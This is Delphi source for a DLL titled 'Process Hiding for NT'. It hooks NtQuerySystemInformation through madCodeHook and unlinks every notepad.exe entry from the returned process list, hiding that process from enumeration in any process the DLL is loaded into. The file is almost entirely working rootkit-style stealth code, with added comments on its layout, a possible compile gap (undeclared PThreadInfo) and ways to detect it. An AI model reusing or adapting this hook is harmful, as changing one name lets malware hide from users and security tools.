
{
Process Hiding for NT
}
library HookProcessEnumeration2;
{$IMAGEBASE $57000000}
uses Windows, SysUtils, madCodeHook;
{
Layout the callback below imposes on each entry of the SystemProcessInformation
list that NtQuerySystemInformation returns for information class 5. The field
names are the author's own; the dwUnkown* members are never read by this file
and only keep dwOffset and pszProcessName at the expected byte positions, since
those two are the only members the callback reads or writes. All members are
4 bytes wide (dword or pointer), so this layout fits a 32-bit process only -
presumably the sole target here, given the $IMAGEBASE directive and the lack
of any 64-bit handling.
NOTE(review): PThreadInfo, used by the ThreadInfo member, is not declared in
this listing; it either comes from an omitted part of the file or the unit does
not compile as shown.
}
type
PProcessInfo = ^TProcessInfo;
TProcessInfo=record
dwOffset : dword; // byte offset from this entry to the next one; 0 marks the last entry (the callback's loop stops on it)
dwThreadCount : dword;
dwUnkown1 : array[0..5] of dword;
ftCreationTime : TFileTime;
dwUnkown2 : dword;
dwUnkown3 : dword;
dwUnkown4 : dword;
dwUnkown5 : dword;
dwUnkown6 : dword;
pszProcessName : PWideChar; // image name compared (case-insensitively) by the callback
dwBasePriority : dword;
dwProcessID : dword;
dwParentProcessID : dword;
dwHandleCount : dword;
dwUnkown7 : dword;
dwUnkown8 : dword;
dwVirtualBytesPeak : dword;
dwVirtualBytes : dword;
dwPageFaults : dword;
dwWorkingSetPeak : dword;
dwWorkingSet : dword;
dwUnkown9 : dword;
dwPagedPool : dword; // kbytes
dwUnkown10 : dword;
dwNonPagedPool : dword; // kbytes
dwPageFileBytesPeak : dword;
dwPageFileBytes : dword;
dwPrivateBytes : dword;
dwUnkown11 : dword;
dwUnkown12 : dword;
dwUnkown13 : dword;
dwUnkown14 : dword;
ThreadInfo : PThreadInfo; // Thread list (type not declared in this listing)
end;
// Filled in by HookCode in the initialization section: the callback calls
// through this pointer to reach the original NtQuerySystemInformation, so
// every query is still answered by ntdll before the result is edited.
var NtQuerySystemInformationNextHook: function(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;
// The native (undocumented) API that is hooked below; imported directly from
// ntdll.dll so HookCode can be pointed at its entry in this process.
function NtQuerySystemInformation(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;external 'ntdll.dll';
{
Replacement for NtQuerySystemInformation installed by HookCode (see the
initialization section). Every call is forwarded to the original first; when
the request was a successful SystemProcessInformation query (class 5), the
returned process list is then walked in the caller's own buffer and each entry
whose image name is notepad.exe is unlinked, so the calling process never sees
it. This runs in user mode inside whichever process the DLL is loaded into; the
kernel's view is untouched, only this caller's copy of the list is edited.
  dt      - SYSTEM_INFORMATION_CLASS value requested by the caller
  buf     - caller-supplied output buffer, rewritten in place
  bufsize - size of buf; passed through, not used to bound the walk below
  retlen  - receives the returned/required length; passed through unchanged
  Result  - the NTSTATUS of the original call, returned unchanged
Detection note: since the list is edited after the syscall returns, a
cross-view comparison (an enumeration taken from a process that is not hooked,
or from kernel mode) still shows the hidden entry, and the patch HookCode
presumably applies to ntdll's NtQuerySystemInformation entry in the hooked
process is visible to an integrity check of that function's prologue.
}
function NtQuerySystemInformationCallbackProc(dt : dword; buf : pointer; bufsize : dword; retlen : pointer) : dword; stdcall;
type
PBA = ^TBA;
// A large byte array type used purely to index buf by byte offset; it is a
// cast, not an allocation, and nothing compares cp against bufsize or retlen.
TBA = array[0..1000000] of byte;
var
tmpbuf: PBA;
Pinfo,LastPinfo : PProcessInfo; // current entry, and the most recent entry that stays visible
cp: DWORD; // byte offset of the current entry from the start of buf
curproc:string;
begin
// Let the real call run first; the filter below edits its result in place.
Result := NtQuerySystemInformationNextHook(dt,buf,bufsize,retlen);
// 5 = SystemProcessInformation; every other information class passes through untouched.
if dt<>5 then exit;
// Only a successful query (0 = STATUS_SUCCESS) carries a list worth editing.
if result<>0 then exit;
cp := 0;
tmpbuf := buf;
Repeat
// Entries are chained by relative byte offsets (dwOffset), not by pointers.
Pinfo := PProcessInfo(@tmpbuf[cp]);
curproc:=WideCharToString(pinfo^.pszProcessName);
// Case-insensitive match on the image name only.
if lowercase(curproc)='notepad.exe' then
begin
// Hidden entry is the last one: make its predecessor the last entry and stop.
if pinfo^.dwOffset=0 then begin LastPinfo^.dwOffset:=0;exit;end
// Otherwise make the predecessor skip straight to this entry's successor.
// LastPinfo is deliberately left unchanged, so consecutive matches fold into one jump.
else LastPinfo^.dwOffset:=LastPinfo^.dwOffset+pinfo.dwOffset;
end
else
begin
// This entry stays visible; it is the one whose link gets rewritten if the next entry matches.
LastPinfo:=Pinfo; //I coded this part :P
end;
// Advance to the next entry; dwOffset = 0 marks the end of the list.
cp := cp + Pinfo^.dwOffset;
until Pinfo^.dwOffset = 0;
end;
// Library initialization: redirect NtQuerySystemInformation in this process to
// the callback above and save the original entry in
// NtQuerySystemInformationNextHook so the callback can call through to it.
// Nothing here unhooks on unload.
begin
HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallbackProc, @NtQuerySystemInformationNextHook);
end.